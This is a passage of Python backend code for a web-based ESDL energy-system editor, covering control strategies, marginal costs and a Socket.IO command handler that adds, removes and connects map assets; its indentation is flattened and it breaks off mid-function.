services_list = services.service
for service in services_list:
if isinstance(service, esdl.ControlStrategy):
strategies.append(service)
return strategies
def get_control_strategy_for_asset(asset_id):
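    """Return the controlStrategy reference of the given asset (None if no strategy is attached)."""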
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, asset_id)
return asset.controlStrategy
# strategies = get_control_strategies(es)
# for strategy in strategies:
# cs_a = strategy.energyAsset
# if cs_a.id == asset_id:
# return strategy
# return None
def add_control_strategy_for_asset(asset_id, cs):
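    """Add a control strategy to the energy system's Services, replacing any existing strategy for this asset."""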
active_es_id = get_session('active_es_id')
esh = get_handler()
es = esh.get_energy_system(es_id=active_es_id)
services = es.services
if not services:
services = esdl.Services()
es.services = services
services_list = services.service
for service in set(services_list):
if isinstance(service, esdl.ControlStrategy):
if service.energyAsset.id == asset_id:
services_list.remove(service)
services.service.append(cs)
def add_drivenby_control_strategy_for_asset(asset_id, control_strategy, port_id):
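    """Create a driven-by control strategy (DrivenByDemand or DrivenBySupply, given by class name) for an asset
    and couple it to the given port.
    """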
active_es_id = get_session('active_es_id')
esh = get_handler()
module = importlib.import_module('esdl.esdl')
class_ = getattr(module, control_strategy)
cs = class_()
asset = esh.get_by_id(active_es_id, asset_id)
asset_name = asset.name
if not asset_name:
asset_name = 'unknown'
cs.id = str(uuid.uuid4())
cs.name = control_strategy + ' for ' + asset_name
cs.energyAsset = asset
if control_strategy == 'DrivenByDemand':
cs.outPort = next((p for p in esdl.Port.allInstances() if p.id == port_id), None)
if control_strategy == 'DrivenBySupply':
cs.inPort = next((p for p in esdl.Port.allInstances() if p.id == port_id), None)
add_control_strategy_for_asset(asset_id, cs)
def add_storage_control_strategy_for_asset(asset_id, mcc, mdc):
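    """Create a StorageStrategy for an asset with the given marginal charge (mcc) and discharge (mdc) costs."""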
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, asset_id)
if not asset.name:
asset.name = 'Unknown Asset'
cs = esdl.StorageStrategy()
cs.id = str(uuid.uuid4())
cs.name = 'StorageStrategy for ' + asset.name
cs.energyAsset = asset
mcc_sv = esdl.SingleValue(id=str(uuid.uuid4()), name='marginalChargeCosts for ' + asset.name, value=str2float(mcc))
cs.marginalChargeCosts = mcc_sv
    mdc_sv = esdl.SingleValue(id=str(uuid.uuid4()), name='marginalDischargeCosts for ' + asset.name, value=str2float(mdc))
cs.marginalDischargeCosts = mdc_sv
add_control_strategy_for_asset(asset_id, cs)
def add_curtailment_control_strategy_for_asset(asset_id, max_power):
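    """Create a CurtailmentStrategy for an asset with the given maximum power."""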
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, asset_id)
if not asset.name:
asset.name = 'Unknown Asset'
cs = esdl.CurtailmentStrategy()
cs.id = str(uuid.uuid4())
cs.name = 'CurtailmentStrategy for ' + asset.name
cs.energyAsset = asset
cs.maxPower = str2float(max_power)
add_control_strategy_for_asset(asset_id, cs)
def get_storage_marginal_costs(asset_id):
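    """Return the (marginal charge costs, marginal discharge costs) of the asset's StorageStrategy, or (0, 0)."""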
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, asset_id)
es = esh.get_energy_system(es_id=active_es_id)
services = es.services
if services:
services_list = services.service
for service in services_list:
if isinstance(service, esdl.StorageStrategy):
if service.energyAsset == asset:
mcc_sv = service.marginalChargeCosts
mdc_sv = service.marginalDischargeCosts
if mcc_sv:
mcc = mcc_sv.value
else:
mcc = 0
if mdc_sv:
mdc = mdc_sv.value
else:
mdc = 0
return mcc, mdc
return 0, 0
def get_curtailment_max_power(asset_id):
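    """Return the maxPower of the asset's CurtailmentStrategy, or 0 if no such strategy exists."""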
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, asset_id)
es = esh.get_energy_system(es_id=active_es_id)
services = es.services
if services:
services_list = services.service
for service in services_list:
if isinstance(service, esdl.CurtailmentStrategy):
if service.energyAsset == asset:
return service.maxPower
return 0
def remove_control_strategy_for_asset(asset_id):
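    """Delete the control strategy that is attached to the given asset, if any."""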
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, asset_id)
cs = asset.controlStrategy
if cs:
cs.delete()
#services_collection = es.services
#if services_collection:
# services = services_collection.service
# for service in services:
# if isinstance(service, esdl.ControlStrategy):
# if service.energyAsset == asset_id:
# services.remove(service)
# ---------------------------------------------------------------------------------------------------------------------
# Marginal Costs
# ---------------------------------------------------------------------------------------------------------------------
def set_marginal_costs_for_asset(asset_id, marginal_costs):
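    """Set the marginal costs of an asset, creating the CostInformation and SingleValue objects if needed."""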
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, asset_id)
asset_name = asset.name
if not asset_name:
asset_name = asset.id
ci = asset.costInformation
if not ci:
ci = esdl.CostInformation()
asset.costInformation = ci
mc = ci.marginalCosts
if not mc:
mc = esdl.SingleValue()
mc.id = str(uuid.uuid4())
mc.name = asset_name + '-MarginalCosts'
ci.marginalCosts = mc
mc.value = marginal_costs
def get_marginal_costs_for_asset(asset_id):
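    """Return the marginal costs value of an asset, or None if no costs are defined."""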
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, asset_id)
ci = asset.costInformation
if ci:
mc = ci.marginalCosts
if mc:
return mc.value
return None
def str2float(string):
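    """Convert a string to a float, returning 0.0 when the input cannot be parsed."""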
try:
f = float(string)
return f
    except (ValueError, TypeError):
        return 0.0
def get_first_last_of_line(line):
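    """Return the (lat, lon) tuples of the first and last point of an esdl.Line."""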
first = ()
last = ()
    for i, point in enumerate(line.point):
        if i == 0:
            first = (point.lat, point.lon)
        last = (point.lat, point.lon)
return first, last
@executor.job
def call_process_energy_system(esh, filename=None, es_title=None, app_context=None, force_update_es_id=None, zoom=True):
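    """Background job wrapper around process_energy_system."""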
process_energy_system(esh, filename, es_title, app_context, force_update_es_id, zoom)
# ---------------------------------------------------------------------------------------------------------------------
# React on commands from the browser (add, remove, ...)
# ---------------------------------------------------------------------------------------------------------------------
@socketio.on('command', namespace='/esdl')
def process_command(message):
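    """Main command dispatcher: handles 'command' messages from the browser (add/remove objects,
    connect ports, profiles, carriers, etc.), updates the ESDL model and refreshes the browser UI.
    """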
logger.info('received: ' + message['cmd'])
if not valid_session():
send_alert("Session has timed out, please refresh")
return
#logger.debug (message)
#logger.debug (session)
user_email = get_session('user-email')
user_actions_logging.store_logging(user_email, "command", message['cmd'], json.dumps(message), "", {})
active_es_id = get_session('active_es_id')
if active_es_id is None:
send_alert('Serious error: no active es id found. Please report')
return
esh = get_handler()
if esh is None:
logger.error('ERROR finding EnergySystemHandler, Session issue??')
area_bld_list = get_session_for_esid(active_es_id, 'area_bld_list')
es_edit = esh.get_energy_system(es_id=active_es_id)
# test to see if this should be moved down:
# session.modified = True
# logger.debug (get_handler().instance[0].area.name)
if message['cmd'] == 'add_object':
area_bld_id = message['area_bld_id']
asset_id = message['asset_id']
object_type = message['object']
asset_name = message['asset_name']
asset = None
shape = message['shape']
geometry = ESDLGeometry.create_ESDL_geometry(shape)
if object_type == 'Area':
if not isinstance(geometry, esdl.Polygon):
send_alert('Areas with geometries other than polygons are not supported')
else:
if isinstance(geometry, esdl.Polygon):
new_area = esdl.Area(id=asset_id, name=asset_name)
new_area.geometry = geometry
# Update drop down list with areas and buildings
add_area_to_area_bld_list(new_area, area_bld_id, area_bld_list)
emit('area_bld_list', {'es_id': active_es_id, 'area_bld_list': area_bld_list})
# Add area to the indicated area
if not ESDLEnergySystem.add_area_to_area(es_edit, new_area, area_bld_id):
send_alert('Can not add area to building')
# Send new area shapes to the browser
area_list = []
boundary_wgs = ESDLGeometry.create_boundary_from_geometry(geometry)
area_list.append(ESDLGeometry.create_geojson(new_area.id, new_area.name, [], boundary_wgs))
esh.add_object_to_dict(active_es_id, new_area)
emit('geojson', {"layer": "area_layer", "geojson": area_list})
else:
                    send_alert('Cannot add an area with a shape other than a Polygon')
else:
edr_asset_str = get_session('adding_edr_assets')
if edr_asset_str:
asset = ESDLAsset.load_asset_from_string(edr_asset_str)
# TODO: deepcopy does not work.
# asset = copy.deepcopy(edr_asset)
# Quick fix: session variable adding_edr_assets now contains ESDL string
class_ = type(asset)
object_type = class_.__name__
print(asset)
                # Check if any IDs were 'accidentally' set in the EDR model template and replace them with a new unique ID
                # If no ID was set, don't assign a new ID either
for c in asset.eContents:
if c.eClass.findEStructuralFeature('id'):
if c.eGet('id'):
c.eSet('id', str(uuid.uuid4()))
else:
asset_drawing_mode = get_session('asset_drawing_mode')
if asset_drawing_mode == 'asset_from_measures':
asset_from_measure_id = get_session('asset_from_measure_id')
asset = AssetsToBeAdded.get_instance_of_measure_with_asset_id(es_edit, asset_from_measure_id)
atba = AssetsToBeAdded.get_instance()
atba.reduce_ui_asset_count(es_edit, asset_from_measure_id)
class_ = type(asset)
object_type = class_.__name__
else:
module = importlib.import_module('esdl.esdl')
class_ = getattr(module, object_type)
asset = class_()
if issubclass(class_, esdl.Potential):
potential = class_()
potential.id = asset_id
potential.name = asset_name
potential.geometry = geometry
add_to_building = False
if not ESDLAsset.add_object_to_area(es_edit, potential, area_bld_id):
ESDLAsset.add_object_to_building(es_edit, potential, area_bld_id)
add_to_building = True
potentials_to_be_added = []
if isinstance(geometry, esdl.Point):
potentials_to_be_added.append(
['point', 'potential', potential.name, potential.id, type(potential).__name__,
[geometry.lat, geometry.lon]])
elif isinstance(geometry, esdl.Polygon):
coords = ESDLGeometry.parse_esdl_subpolygon(potential.geometry.exterior, False) # [lon, lat]
coords = ESDLGeometry.exchange_coordinates(coords)
potentials_to_be_added.append(
['polygon', 'potential', potential.name, potential.id, type(potential).__name__, coords])
if potentials_to_be_added:
emit('add_esdl_objects', {'es_id': es_edit.id, 'add_to_building': add_to_building,
'asset_pot_list': potentials_to_be_added, 'zoom': False})
esh.add_object_to_dict(active_es_id, potential)
else:
asset.id = asset_id
asset.name = asset_name
asset.geometry = geometry
if isinstance(geometry, esdl.Point):
port_loc = (shape['coordinates']['lat'], shape['coordinates']['lng'])
elif isinstance(geometry, esdl.Polygon):
port_loc = ESDLGeometry.calculate_polygon_center(geometry)
polygon_area = int(shape['polygon_area'])
if not isinstance(asset, esdl.AbstractBuilding):
if asset.surfaceArea:
if asset.power:
asset.power = asset.power * polygon_area / asset.surfaceArea
asset.surfaceArea = polygon_area
else:
asset.surfaceArea = polygon_area
# Set port existence booleans
no_out_port = True
no_in_port = True
if isinstance(asset, esdl.EnergyAsset):
for p in asset.port:
if isinstance(p, esdl.OutPort):
no_out_port = False
if isinstance(p, esdl.InPort):
no_in_port = False
if not isinstance(asset, esdl.AbstractBuilding):
# -------------------------------------------------------------------------------------------------------------
# Add assets with a polyline geometry and an InPort and an OutPort
# -------------------------------------------------------------------------------------------------------------
if object_type in ['ElectricityCable', 'Pipe']:
# Assume pipes and cables never have ports (coming out of the EDR)
inp = esdl.InPort(id=str(uuid.uuid4()), name='In')
asset.port.append(inp)
outp = esdl.OutPort(id=str(uuid.uuid4()), name='Out')
asset.port.append(outp)
asset.length = float(shape['length']) if 'length' in shape else 0.0
print(message)
# automatically connect the conductor to the ports that have been clicked
if 'connect_ports' in message and message['connect_ports'] != '':
connect_ports_msg = message['connect_ports']
start_port = None
end_port = None
from_port1 = None
to_port1 = None
from_port2 = None
to_port2 = None
if 'asset_start_port' in connect_ports_msg:
asset_start_port = connect_ports_msg['asset_start_port']
start_port = esh.get_by_id(active_es_id, asset_start_port)
if 'asset_end_port' in connect_ports_msg:
asset_end_port = connect_ports_msg['asset_end_port']
end_port = esh.get_by_id(active_es_id, asset_end_port)
# cannot connect to same port type
if start_port is not None and end_port is not None and \
type(start_port) == type(end_port):
other_type = esdl.InPort.eClass.name if isinstance(start_port, esdl.OutPort) \
else esdl.OutPort.eClass.name
send_alert(
"Please connect the {} to an {}".format(object_type, other_type))
return
require_reversed = False # to indicate the coordinates of the line need reversal
if start_port is not None:
if isinstance(start_port, esdl.OutPort):
inp.connectedTo.append(start_port)
from_port1 = inp
to_port1 = start_port
elif isinstance(start_port, esdl.InPort):
outp.connectedTo.append(start_port)
from_port1 = outp
to_port1 = start_port
require_reversed = True
if end_port is not None:
if isinstance(end_port, esdl.InPort):
outp.connectedTo.append(end_port)
from_port2 = outp
to_port2 = end_port
elif isinstance(end_port, esdl.OutPort):
inp.connectedTo.append(end_port)
from_port2 = inp
to_port2 = end_port
require_reversed = True
if require_reversed:
line: esdl.Line = asset.geometry # reverse coordinate to change direction of line
point = list(line.point) # copy list
line.point.clear()
for p in point:
line.point.insert(0, p) # reverse list of coordinates
# Send connections
add_to_building = False # TODO: Fix using this inside buildings
conn_list = get_session_for_esid(active_es_id, 'conn_list')
carrier_id = None
if start_port:
if isinstance(start_port, esdl.InPort):
asset1_port_location = asset.geometry.point[-1]
else:
asset1_port_location = asset.geometry.point[0]
if start_port.carrier is not None:
carrier_id = start_port.carrier.id
inp.carrier = start_port.carrier
outp.carrier = start_port.carrier
if end_port is not None and end_port.carrier is None:
# in case of a joint: set the carrier for all ports
if isinstance(end_port.energyasset, esdl.Joint):
for p in end_port.energyasset.port:
p.carrier = start_port.carrier if p.carrier is None else p.carrier
else:
end_port.carrier = start_port.carrier
if end_port:
if isinstance(end_port, esdl.InPort):
asset2_port_location = asset.geometry.point[-1]
else:
asset2_port_location = asset.geometry.point[0]
if end_port.carrier is not None and carrier_id is None: # no start_port carrier
carrier_id = end_port.carrier.id
inp.carrier = end_port.carrier
outp.carrier = end_port.carrier
if start_port is not None and start_port.carrier is None:
# in case of a joint: set the carrier for all ports
if isinstance(start_port.energyasset, esdl.Joint):
for p in start_port.energyasset.port:
p.carrier = end_port.carrier if p.carrier is None else p.carrier
else:
start_port.carrier = end_port.carrier
# send messages to update connections and start port / end port marker colors based on
# the carriers
if start_port:
conn_message = {'from-port-id': from_port1.id,
'from-port-carrier': from_port1.carrier.id if from_port1.carrier else None,
'from-asset-id': from_port1.eContainer().id,
'from-asset-coord': [asset1_port_location.lat, asset1_port_location.lon],
'to-port-id': to_port1.id,
'to-port-carrier': to_port1.carrier.id if to_port1.carrier else None,
'to-asset-id': to_port1.eContainer().id,
'to-asset-coord': [asset1_port_location.lat, asset1_port_location.lon]}
conn_list.append(conn_message)
emit('add_connections', {"es_id": active_es_id, "conn_list": [conn_message]})
# update ports of from_port asset
from_asset = start_port.eContainer()
port_list = []
for p in from_asset.port:
port_list.append({'name': p.name, 'id': p.id, 'type': type(p).__name__,
'conn_to': [pt.id for pt in p.connectedTo],
'carrier': p.carrier.id if p.carrier else None})
emit('update_asset', {'asset_id': from_asset.id, 'ports': port_list})
if end_port:
conn_message = {'from-port-id': from_port2.id,
'from-port-carrier': from_port2.carrier.id if from_port2.carrier else None,
'from-asset-id': from_port2.eContainer().id,
'from-asset-coord': [asset2_port_location.lat, asset2_port_location.lon],
'to-port-id': to_port2.id,
'to-port-carrier': to_port2.carrier.id if to_port2.carrier else None,
'to-asset-id': to_port2.eContainer().id,
'to-asset-coord': [asset2_port_location.lat, asset2_port_location.lon]}
conn_list.append(conn_message)
emit('add_connections', {"es_id": active_es_id, "conn_list": [conn_message]})
# update ports of from_port asset
to_asset = end_port.eContainer()
port_list = []
for p in to_asset.port:
port_list.append({'name': p.name, 'id': p.id, 'type': type(p).__name__,
'conn_to': [pt.id for pt in p.connectedTo],
'carrier': p.carrier.id if p.carrier else None})
emit('update_asset', {'asset_id': to_asset.id, 'ports': port_list})
# -------------------------------------------------------------------------------------------------------------
# Add assets with an InPort and two OutPorts (either point or polygon)
# -------------------------------------------------------------------------------------------------------------
elif object_type in ['CHP', 'FuelCell']:
# Assume CHPs and FuelCells never have ports (coming out of the EDR)
inp = esdl.InPort(id=str(uuid.uuid4()), name='In')
asset.port.append(inp)
e_outp = esdl.OutPort(id=str(uuid.uuid4()), name='E Out')
asset.port.append(e_outp)
h_outp = esdl.OutPort(id=str(uuid.uuid4()), name='H Out')
asset.port.append(h_outp)
else:
capability = ESDLAsset.get_asset_capability_type(asset)
# The view mode influences if single or double ports are added
double_line_mode = False
view_modes = ViewModes.get_instance()
if view_modes.get_user_settings(user_email)['mode'] == 'CHESS':
double_line_mode = True
# For producers, consumers (and storage) check if a port already exists (coming from the EDR)
if capability == 'Producer':
if no_out_port:
asset.port.append(esdl.OutPort(id=str(uuid.uuid4()), name='Out'))
if double_line_mode:
if no_in_port:
asset.port.append(esdl.InPort(id=str(uuid.uuid4()), name='In'))
elif capability in ['Consumer', 'Storage']:
if no_in_port:
asset.port.append(esdl.InPort(id=str(uuid.uuid4()), name='In'))
if double_line_mode:
if no_out_port:
asset.port.append(esdl.OutPort(id=str(uuid.uuid4()), name='Out'))
elif capability == 'Conversion':
if object_type == "HeatPump" and double_line_mode:
asset.port.append(esdl.InPort(id=str(uuid.uuid4()), name='PrimIn'))
asset.port.append(esdl.OutPort(id=str(uuid.uuid4()), name='PrimOut'))
asset.port.append(esdl.InPort(id=str(uuid.uuid4()), name='SecIn'))
asset.port.append(esdl.OutPort(id=str(uuid.uuid4()), name='SecOut'))
else:
asset.port.append(esdl.InPort(id=str(uuid.uuid4()), name='In'))
asset.port.append(esdl.OutPort(id=str(uuid.uuid4()), name='Out'))
elif capability == 'Transport':
if object_type == 'HeatExchange' or object_type == 'Transformer':
asset.port.append(esdl.InPort(id=str(uuid.uuid4()), name='PrimIn'))
if double_line_mode:
asset.port.append(esdl.OutPort(id=str(uuid.uuid4()), name='PrimOut'))
asset.port.append(esdl.OutPort(id=str(uuid.uuid4()), name='SecOut'))
if double_line_mode:
asset.port.append(esdl.InPort(id=str(uuid.uuid4()), name='SecIn'))
else:
asset.port.append(esdl.InPort(id=str(uuid.uuid4()), name='In'))
asset.port.append(esdl.OutPort(id=str(uuid.uuid4()), name='Out'))
else:
logger.error('Unknown asset capability {}'.format(capability))
else:
# Update drop down list with areas and buildings
add_bld_to_area_bld_list(asset, area_bld_id, area_bld_list)
emit('area_bld_list', {'es_id': active_es_id, 'area_bld_list': area_bld_list})
add_to_building = False
if not ESDLAsset.add_object_to_area(es_edit, asset, area_bld_id):
ESDLAsset.add_object_to_building(es_edit, asset, area_bld_id)
add_to_building = True
asset_to_be_added_list = []
buildings_to_be_added_list = []
# TODO: check / solve cable as Point issue?
if not isinstance(asset, esdl.AbstractBuilding):
port_list = []
ports = asset.port
for p in ports:
connTo_ids = list(o.id for o in p.connectedTo)
carrier_id = p.carrier.id if p.carrier else None
port_list.append(
{'name': p.name, 'id': p.id, 'type': type(p).__name__, 'conn_to': connTo_ids,
'carrier': carrier_id})
if isinstance(asset, esdl.AbstractBuilding):
if isinstance(geometry, esdl.Point):
buildings_to_be_added_list.append(['point', asset.name, asset.id, type(asset).__name__,
[shape['coordinates']['lat'], shape['coordinates']['lng']],
False, {}])
elif isinstance(geometry, esdl.Polygon):
coords = ESDLGeometry.parse_esdl_subpolygon(asset.geometry.exterior, False) # [lon, lat]
coords = ESDLGeometry.exchange_coordinates(coords) # --> [lat, lon]
boundary = ESDLGeometry.create_boundary_from_geometry(geometry)
buildings_to_be_added_list.append(['polygon', asset.name, asset.id, type(asset).__name__,
boundary["coordinates"], False, {}])
emit('add_building_objects', {'es_id': es_edit.id, 'building_list': buildings_to_be_added_list,
'zoom': False})
else:
capability_type = ESDLAsset.get_asset_capability_type(asset)
state = asset_state_to_ui(asset)
if isinstance(geometry, esdl.Point):
tooltip_asset_attrs = get_tooltip_asset_attrs(asset, 'marker')
add_spatial_attributes(asset, tooltip_asset_attrs)
asset_to_be_added_list.append(['point', 'asset', asset.name, asset.id, type(asset).__name__,
[shape['coordinates']['lat'], shape['coordinates']['lng']],
tooltip_asset_attrs, state, port_list, capability_type])
elif isinstance(geometry, esdl.Polygon):
coords = ESDLGeometry.parse_esdl_subpolygon(asset.geometry.exterior, False) # [lon, lat]
coords = ESDLGeometry.exchange_coordinates(coords) # --> [lat, lon]
# logger.debug(coords)
tooltip_asset_attrs = get_tooltip_asset_attrs(asset, 'polygon')
add_spatial_attributes(asset, tooltip_asset_attrs)
asset_to_be_added_list.append(
['polygon', 'asset', asset.name, asset.id, type(asset).__name__, coords,
tooltip_asset_attrs, state, port_list, capability_type])
elif isinstance(geometry, esdl.Line):
coords = []
for point in geometry.point:
coords.append([point.lat, point.lon])
tooltip_asset_attrs = get_tooltip_asset_attrs(asset, 'line')
add_spatial_attributes(asset, tooltip_asset_attrs)
asset_to_be_added_list.append(['line', 'asset', asset.name, asset.id, type(asset).__name__,
coords, tooltip_asset_attrs, state, port_list])
#logger.debug(asset_to_be_added_list)
emit('add_esdl_objects', {'es_id': es_edit.id, 'add_to_building': add_to_building,
'asset_pot_list': asset_to_be_added_list, 'zoom': False})
asset_list = get_session_for_esid(es_edit.id, 'asset_list')
for al_asset in asset_to_be_added_list:
asset_list.append(al_asset)
esh.add_object_to_dict(es_edit.id, asset)
if hasattr(asset, 'port'):
for added_port in asset.port:
esh.add_object_to_dict(es_edit.id, added_port)
set_handler(esh)
if message['cmd'] == 'remove_object':
# removes asset or potential from EnergySystem
obj_id = message['id']
if obj_id:
# asset = ESDLAsset.find_asset(es_edit.instance[0].area, obj_id)
# asset can also be any other object in ESDL
asset = esh.get_by_id(active_es_id, obj_id)
if isinstance(asset, esdl.AbstractBuilding):
# Update drop down list with areas and buildings
remove_ab_from_area_bld_list(asset.id, area_bld_list)
emit('area_bld_list', {'es_id': active_es_id, 'area_bld_list': area_bld_list})
if asset:
# Try to remove control strategy for EnergyAssets (and not for buildings)
if isinstance(asset, esdl.EnergyAsset):
remove_control_strategy_for_asset(asset.id)
ESDLAsset.remove_object_from_energysystem(es_edit, obj_id)
esh.remove_object_from_dict(es_edit.id, asset, True)
# remove from asset dict
asset_list = get_session_for_esid(active_es_id, 'asset_list')
asset_list[:] = [a for a in asset_list if a[3] != obj_id] # filter list in place
conn_list = get_session_for_esid(active_es_id, 'conn_list')
conn_list[:] = [c for c in conn_list
                                if not ((c['from-asset-id'] == obj_id) or (c['to-asset-id'] == obj_id))]  # filter list in place
else:
send_alert('Asset or potential without an id cannot be removed')
if message['cmd'] == 'add_note':
id = message['id']
location = message['location']
author = message['author']
note = esdl.Note(id=id, author=author)
dt = parse_date(message['date'])
if dt:
note.date = EDate.from_string(str(dt))
else:
send_alert('Invalid datetime format')
point = esdl.Point(lat=location['lat'], lon=location['lng'])
note.mapLocation = point
esh.add_object_to_dict(es_edit.id, note)
esi = es_edit.energySystemInformation
if not esi:
esi = esdl.EnergySystemInformation(id=str(uuid.uuid4()))
es_edit.energySystemInformation = esi
esh.add_object_to_dict(es_edit.id, esi)
notes = esi.notes
if not notes:
notes = esdl.Notes(id=str(uuid.uuid4()))
esi.notes = notes
esh.add_object_to_dict(es_edit.id, notes)
notes.note.append(note)
esh.add_object_to_dict(es_edit.id, note)
if message['cmd'] == 'remove_area':
area_id = message['id']
if area_id:
top_area = es_edit.instance[0].area
if top_area:
if top_area.id == area_id:
send_alert('Can not remove top level area')
elif not ESDLEnergySystem.remove_area(top_area, area_id):
send_alert('Area could not be removed')
if message['cmd'] == 'get_asset_ports':
asset_id = message['id']
port_list = []
if asset_id:
asset = ESDLAsset.find_asset(es_edit.instance[0].area, asset_id)
ports = asset.port
for p in ports:
port_list.append({'id': p.id, 'type': type(p).__name__})
emit('portlist', port_list)
if message['cmd'] == 'connect_ports':
port1_id = message['port1id']
port2_id = message['port2id']
# still not optimal, but done to get rid of mapping, optimize later
asset_and_coord1 = get_asset_and_coord_from_port_id(esh, active_es_id, port1_id)
asset_and_coord2 = get_asset_and_coord_from_port_id(esh, active_es_id, port2_id)
asset1 = asset_and_coord1['asset']
asset2 = asset_and_coord2['asset']
asset1_port_location = asset_and_coord1['coord']
asset2_port_location = asset_and_coord2['coord']
port1 = None
port2 = None
for p in asset1.port:
if p.id == port1_id:
port1 = p
break
for p in asset2.port:
if p.id == port2_id:
port2 = p
break
if port1 and port2:
# add type check on ports
if type(port1).__name__ == type(port2).__name__:
send_alert('Cannot connect ports of the same type. One should be an InPort and one should be an OutPort')
else:
connect_ports(port1, port2)
add_to_building = False
if asset1.containingBuilding:
asset1_bld_id = asset1.containingBuilding.id
if asset2.containingBuilding:
if asset1.containingBuilding:
# assets both in buildings
if asset1_bld_id == asset2.containingBuilding.id:
# assets in same building
add_to_building = True
else:
# assets in different buildings
bld_asset1 = asset1.containingBuilding
asset1_port_location = (bld_asset1.geometry.lat, bld_asset1.geometry.lon)
bld_asset2 = asset2.containingBuilding
asset2_port_location = (bld_asset2.geometry.lat, bld_asset2.geometry.lon)
add_to_building = False
else:
# asset2 in building and asset1 not in building
bld_asset2 = asset2.containingBuilding
asset2_port_location = (bld_asset2.geometry.lat, bld_asset2.geometry.lon)
add_to_building = False
else:
# asset2 not in building
if asset1.containingBuilding:
# asset1 in building and asset2 not in building
bld_asset1 = asset1.containingBuilding
asset1_port_location = (bld_asset1.geometry.lat, bld_asset1.geometry.lon)
add_to_building = False
else:
# both assets not in building
add_to_building = False
# emit('add_new_conn', {'es_id': es_edit.id, 'add_to_building': add_to_building,
# 'from-port-id': port1_id, 'to-port-id': port2_id,
# 'new_conn': [[asset1_port_location[0], asset1_port_location[1]],
# [asset2_port_location[0], asset2_port_location[1]]]})
# propagate carrier
if not port2.carrier and port1.carrier:
if isinstance(port2.energyasset, esdl.Joint):
                        for p in port2.energyasset.port:  # propagate carrier in case of a joint
p.carrier = port1.carrier if p.carrier is None else p.carrier
else:
port2.carrier = port1.carrier
elif port2.carrier and not port1.carrier:
if isinstance(port1.energyasset, esdl.Joint):
                        for p in port1.energyasset.port:  # propagate carrier in case of a joint
                            p.carrier = port2.carrier if p.carrier is None else p.carrier
else:
port1.carrier = port2.carrier
p1_carr_id = port1.carrier.id if port1.carrier else None
p2_carr_id = port2.carrier.id if port2.carrier else None
conn_list = get_session_for_esid(active_es_id, 'conn_list')
conn_message = {'from-port-id': port1_id, 'from-port-carrier': p1_carr_id, 'from-asset-id': asset1.id,
'from-asset-coord': [asset1_port_location[0], asset1_port_location[1]],
'to-port-id': port2_id, 'to-port-carrier': p2_carr_id, 'to-asset-id': asset2.id,
'to-asset-coord': [asset2_port_location[0], asset2_port_location[1]]}
conn_list.append(conn_message)
emit('add_connections', {"es_id": active_es_id, "conn_list": [conn_message]})
# update ports of assets that are connected
port_list = []
for p in asset1.port:
port_list.append({'name': p.name, 'id': p.id, 'type': type(p).__name__,
'conn_to': [pt.id for pt in p.connectedTo],
'carrier': p.carrier.id if p.carrier else None})
emit('update_asset', {'asset_id': asset1.id, 'ports': port_list})
port_list = []
for p in asset2.port:
port_list.append({'name': p.name, 'id': p.id, 'type': type(p).__name__,
'conn_to': [pt.id for pt in p.connectedTo],
'carrier': p.carrier.id if p.carrier else None})
emit('update_asset', {'asset_id': asset2.id, 'ports': port_list})
else:
send_alert('Serious error connecting ports')
if message['cmd'] == 'get_object_info':
object_id = message['id']
asspot = message['asspot']
area = es_edit.instance[0].area
connected_to_info = []
ctrl_strategy = None
if asspot == 'asset':
# asset = ESDLAsset.find_asset(area, object_id)
asset = esh.get_by_id(es_edit.id, object_id)
logger.debug('Get info for asset ' + asset.id)
attrs_sorted = ESDLEcore.get_asset_attributes(asset, esdl_doc)
name = asset.name
if isinstance(asset, esdl.EnergyAsset):
connected_to_info = get_connected_to_info(asset)
if asset.controlStrategy:
ctrl_strategy = asset.controlStrategy.name
else:
ctrl_strategy = None
asset_class = 'EnergyAsset'
else:
asset_class = 'AbstractBuilding'
asset_doc = asset.__doc__
else:
pot = esh.get_by_id(es_edit.id, object_id)
logger.debug('Get info for potential ' + pot.id)
attrs_sorted = ESDLEcore.get_asset_attributes(pot, esdl_doc)
name = pot.name
            connected_to_info = []
            ctrl_strategy = None
            asset_class = 'Potential'  # ensure asset_class is defined for the emit below (label chosen here, not dictated by the frontend)
            asset_doc = pot.__doc__
if name is None: name = ''
emit('asset_info', {'id': object_id, 'name': name, 'class': asset_class, 'attrs': attrs_sorted, 'connected_to_info': connected_to_info, 'ctrl_strategy': ctrl_strategy, 'asset_doc': asset_doc})
if message['cmd'] == 'get_conductor_info':
asset_id = message['id']
latlng = message['latlng']
area = es_edit.instance[0].area
asset = ESDLAsset.find_asset(area, asset_id)
connected_to_info = get_connected_to_info(asset)
logger.debug('Get info for conductor ' + asset.id)
attrs_sorted = ESDLEcore.get_asset_attributes(asset, esdl_doc)
name = asset.name
if name is None: name = ''
asset_doc = asset.__doc__
emit('asset_info', {'id': asset_id, 'name': name, 'class': 'EnergyAsset', 'latlng': latlng, 'attrs': attrs_sorted, 'connected_to_info': connected_to_info, 'asset_doc': asset_doc})
if message['cmd'] == 'get_table_editor_info':
producer_info_list = []
consumer_info_list = []
transport_info_list = []
storage_info_list = []
conversion_info_list = []
energy_assets = esh.get_all_instances_of_type(esdl.EnergyAsset, active_es_id)
for asset in energy_assets:
attrs_sorted = ESDLEcore.get_asset_attributes(asset, esdl_doc)
connected_to_info = get_connected_to_info(asset)
strategy_info = get_control_strategy_info(asset)
profile_info = get_port_profile_info(asset)
mc_info = None
ci = asset.costInformation
if ci:
mc = ci.marginalCosts
if mc:
mc_info = mc.value
name = asset.name
if name is None: name = ''
asset_doc = asset.__doc__
asset_type = type(asset).__name__
asset_info = {
'id': asset.id,
'name': name,
'type': asset_type,
'attrs': attrs_sorted,
'connected_to_info': connected_to_info,
'control_strategy': strategy_info,
'marginal_costs': mc_info,
'profile_info': profile_info,
'asset_doc': asset_doc
}
if isinstance(asset, esdl.Producer):
producer_info_list.append(asset_info)
if isinstance(asset, esdl.Consumer):
consumer_info_list.append(asset_info)
if isinstance(asset, esdl.Transport):
transport_info_list.append(asset_info)
if isinstance(asset, esdl.Storage):
